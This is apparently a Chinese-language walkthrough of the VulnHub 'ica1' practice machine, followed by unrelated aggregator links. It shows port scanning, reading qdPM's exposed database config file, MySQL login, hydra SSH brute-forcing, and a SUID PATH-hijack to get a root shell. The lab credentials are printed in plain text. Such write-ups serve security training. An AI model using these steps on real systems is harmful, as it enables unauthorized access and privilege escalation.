当前位置: 首页 > news >正文

vulhub ica1靶场攻略

 下载地址:

https://download.vulnhub.com/ica/ica1.zip

靶场使用:

用Oracle VirtualBox靶场打开,我的网络配置如下,我的kali用的是VMware的,需要保证桥接网卡的名称相同。

kali的nmap扫描网段存活主机,扫描到了靶机位置,并且扫描出了他的端口:80,22,3306记住这三个端口,每一个都要用到。

浏览器访问页面

要我们登录,邮箱加密码,我们自然没有,但是他提供了所使用的框架信息:qdpm 9.2。

我们到kali查询一下这个框架有什么漏洞searchsploit qdpm 9.2

查看一下具体利用方式:

这里告诉我们数据库的账号密码在一个文件里,http://192.168.43.67/core/config/databases.yml,我们访问一下:

得到了账号为qdpmadmin,密码:UcVQCMQk2STVeS6J

kali登录一下数据库:普通的命令:mysql -h 192.168.43.67 -u qdpmadmin -p UcVQCMQk2STVeS6J 会报错,我问了下腾讯元宝,命令:

mysql -h 192.168.43.67 -P 3306 --user=qdpmadmin --password=UcVQCMQk2STVeS6J  --ssl-verify-server-cert=0,这个命令可以连上

在数据库里我们得到了用户名和密码各五个,因为是用户名不是邮件,那么这里登录的不是之前的登录页面。那么应该是ssh

password是经过base64编码的,咱们自己解码一下

我们将获得账户名和密码放入username和passwd文件中使用hydra进行爆破一下,命令:hydra -L username -P passwd ssh://192.168.43.67 。

得到两个账号密码:travis  DJceVy98W28Y7wLg,dexter  7ZwV4qtg42cmUXGX

成功登录

提权:

find / -perm -4000 -type f 2>/dev/null

echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH 
echo $PATH
cd /opt
./get access

http://www.dtcms.com/a/306384.html

相关文章:

  • AI框架工具FastRTC快速上手2——整体框架及Stream类详解
  • 浏览器pdf、image显示
  • MaxKB+MinerU:通过API实现PDF文档解析并存储至知识库
  • 虚幻基础:旋转体
  • 在java开发中,错误信息类中定义一个errMap,为什么要在static{}中,put键值对?这是为什么?好处是什么?
  • 嵌入式 C 语言入门:分支结构(if/switch)的用法与硬件控制实践
  • [ java IO ] 文件传输中的输入输出(流)
  • 算法能力提升之快速矩阵
  • PSO-TCN-BiLSTM-MATT粒子群优化算法优化时间卷积神经网络-双向长短期记忆神经网络融合多头注意力机制多特征分类预测/故障诊断Matlab实现
  • 电动车充电桩能耗实时监测解决方案
  • 【Java】批量生成Excel放入文件夹并打zip压缩包
  • LangChain 完全入门:5分钟搭建你的第一个AI智能体
  • 河南萌新联赛2025第(三)场:河南理工大学【补题】
  • 氯碱废水除钙镁金属离子
  • 无人机在复杂气流中,IMU 如何精准捕捉姿态变化以维持稳定?
  • WPFC#超市管理系统(3)商品管理
  • 今日行情明日机会——20250730
  • 【LeetCode】链表反转实现与测试
  • ansible巡检脚本
  • 2025年7月28日–7月29日 · AI 今日头条
  • 串口接收数据包(协议带帧头帧尾)的编程实现方法:1、数据包格式定义结构体2、使用队列进行数据接收、校验解包
  • centos7 aarch64上安装PostgreSQL14.3
  • 如何在生成式引擎优化(GEO)中取得成功
  • Java:高频面试知识分享1
  • 比特币挖矿的能源消耗和环保问题
  • 【Linux】重生之从零开始学习运维之备份恢复
  • CONTRASTIVE-KAN:一种用于稀缺标记数据的网络安全半监督入侵检测框架
  • Apache Kafka核心组件详解
  • click和touch事件触发顺序 糊里糊涂解决的奇怪bug
  • 开源 Arkts 鸿蒙应用 开发(十二)传感器的使用